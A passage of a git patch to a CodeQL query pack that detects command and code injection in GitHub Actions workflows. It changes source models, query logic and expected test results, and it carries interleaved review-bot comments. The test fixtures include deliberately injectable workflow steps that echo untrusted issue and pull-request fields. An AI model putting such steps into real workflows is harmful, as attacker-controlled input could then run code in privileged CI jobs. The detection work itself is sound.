+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
index d7cbde25b88..2e5b0d42efd 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files"]
diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
index b872bbe2ed0..18339bfa4e9 100644
--- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
+++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index 1618eddf2d8..a7afc090a91 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -4,7 +4,7 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] - - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] + - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 7c681d8a64b..7890668fa87 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml 
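Review bot: With the trigger column gone, the two added rows for `khan/pull-request-comment-trigger` are byte-identical, so the second adds nothing; the `sources` listing in `ql/test/library-tests/test.expected` later in this patch shows a single row for it. The same happens in `xt0rted_slash-command-action.model.yml`, where both rows also keep an empty kind `""` although this file now says `"Comment body"`. I would keep one row per action and give the xt0rted row (and the `tzkhan/pr-update-action` row) a non-empty label as well, if the kind is what ends up in the reported source type.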
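Review bot: The kind label on the `output.ref_branch` row of `tj-actions_branch-names.model.yml` carries the typo `tirggering` over from the removed line, and the same string is copied into `test.expected`. Since the row is rewritten here anyway, `- ["tj-actions/branch-names", "*", "output.ref_branch", "Branch triggering workflow run"]` would fix it, with the expected file updated to match.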
@@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file + - 
["tj-actions/changed-files", "*", "output.added_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 9b6649892af..1946b78f5fd 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml 
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files"]
diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml
index 6ce7dd68b3f..d4b083e14d2 100644
--- a/ql/lib/ext/tzkhan_pr-update-action.model.yml
+++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""]
+ - ["tzkhan/pr-update-action", "*", "output.headMatch", ""]
diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml
index 72df42535db..31a1eb5bde9 100644
--- a/ql/lib/ext/xt0rted_slash-command-action.model.yml
+++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""]
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", "pull_request_comment", ""]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""]
diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql
index 6f66535e6a4..2f9a09f59c3 100644
--- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql
+++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql
@@ -16,14 +16,16 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w where CommandInjectionFlow::flowPath(source, sink) and w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) + not isSingleTriggerWorkflow(w, "pull_request") select sink.getNode(), source, sink, "Potential privileged command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 69ab240616e..62030e32263 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -18,14 +18,16 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w where CodeInjectionFlow::flowPath(source, sink) and w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) + not isSingleTriggerWorkflow(w, "pull_request") select sink.getNode(), source, sink, "Potential privileged code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() 
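Review bot: `isSingleTriggerWorkflow` is added here and again, character for character, in the `PrivilegedCodeInjection.ql` hunk, and neither copy has a QLDoc comment; one definition in a library both queries import, with a line saying it holds when the given trigger is the only event that starts the workflow, would keep the two privilege gates from drifting apart. Because sources no longer carry a trigger, `not isSingleTriggerWorkflow(w, "pull_request")` is now the only condition that separates privileged from unprivileged workflows. A workflow that lists any second event next to `pull_request`, or that runs only on an event for which the matched `github.event.*` context is not populated, is therefore reported, which the updated comment in the `pull_request_target.yml` test acknowledges. The alert text still says the value "may be controlled by an external user", so the query help should probably state these expected false positives so that triage does not treat every hit as confirmed.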
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 5395fe82453..a8a0414dd9f 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -313,48 +313,46 @@ scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/test.yml:1:1:40:53 | on: push | sources -| ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | -| ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files | -| amannn/action-semantic-pull-request | * | output.error_message | pull_request_target | PR title | -| cypress-io/github-action | * | env.GH_BRANCH | pull_request_target | PR branch | -| dawidd6/action-download-artifact | * | output.artifacts | * | Artifact details | -| dorny/paths-filter | * | output.changes | pull_request_target | PR changed files | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title | -| jitterbit/get-changed-files | * | output.added | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.added_modified | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.all | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.deleted | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.modified | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.removed | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.renamed | pull_request_target | PR changed files | -| khan/pull-request-comment-trigger | * | output.comment_body | issue_comment | | -| khan/pull-request-comment-trigger | * | output.comment_body | pull_request_comment | | -| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | * | Foo | -| tj-actions/branch-names | * | output.current_branch | pull_request_target | PR current branch | -| tj-actions/branch-names | * | 
output.head_ref_branch | pull_request_target | PR head branch | -| tj-actions/branch-names | * | output.ref_branch | pull_request_target | Branch tirggering workflow run | -| tj-actions/changed-files | * | output.added_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.changed_keys | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.copied_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.deleted_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.modified_keys | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_deleted_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.renamed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.type_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.unknown_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.unmerged_files | pull_request_target | PR changed files | -| tj-actions/verify-changed-files | * | output.changed-files | pull_request_target | PR changed 
files | -| tzkhan/pr-update-action | * | output.headMatch | pull_request_target | | -| xt0rted/slash-command-action | * | output.command-arguments | issue_comment | | -| xt0rted/slash-command-action | * | output.command-arguments | pull_request_comment | | +| ahmadnassri/action-changed-files | * | output.files | PR changed files | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | +| dorny/paths-filter | * | output.changes | PR changed files | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | +| jitterbit/get-changed-files | * | output.added | PR changed files | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | +| jitterbit/get-changed-files | * | output.all | PR changed files | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | +| jitterbit/get-changed-files | * | output.modified | PR changed files | +| jitterbit/get-changed-files | * | output.removed | PR changed files | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | +| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| tj-actions/branch-names | * | output.current_branch | PR current branch | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | +| tj-actions/changed-files | * | output.added_files | PR changed files | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | +| tj-actions/changed-files | * | 
output.all_changed_files | PR changed files | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | +| tj-actions/changed-files | * | output.copied_files | PR changed files | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | +| tj-actions/changed-files | * | output.modified_files | PR changed files | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | +| tj-actions/changed-files | * | output.unknown_files | PR changed files | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | +| tzkhan/pr-update-action | * | output.headMatch | | +| xt0rted/slash-command-action | * | output.command-arguments | | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 268396a711e..d56ec73e26f 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
@@ -49,8 +49,8 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } -query predicate sources(string action, string version, string output, string trigger, string kind) { - sourceModel(action, version, output, trigger, kind) +query predicate sources(string action, string version, string output, string kind) { + sourceModel(action, version, output, kind) } query predicate summaries(string action, string version, string input, string output, string kind) { diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index 215b3252885..995fefe4a15 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' # not defined - - run: echo '${{ github.event.issue.body }}' # not defined + - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, but we will still report it + - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, but we will still report it - run: echo '${{ github.event.pull_request.title }}' - run: echo '${{ github.event.pull_request.body }}' - run: echo '${{ github.event.pull_request.head.label }}' diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index e818ced0c1d..7061f509b81 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -230,6 +230,10 @@ subpaths | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | 
@@ -253,6 +257,8 @@ subpaths | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | 
@@ -271,6 +277,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 822e9bcaab1357c734654d200790bab4b2175bc8 Mon Sep 17 00:00:00 2001 
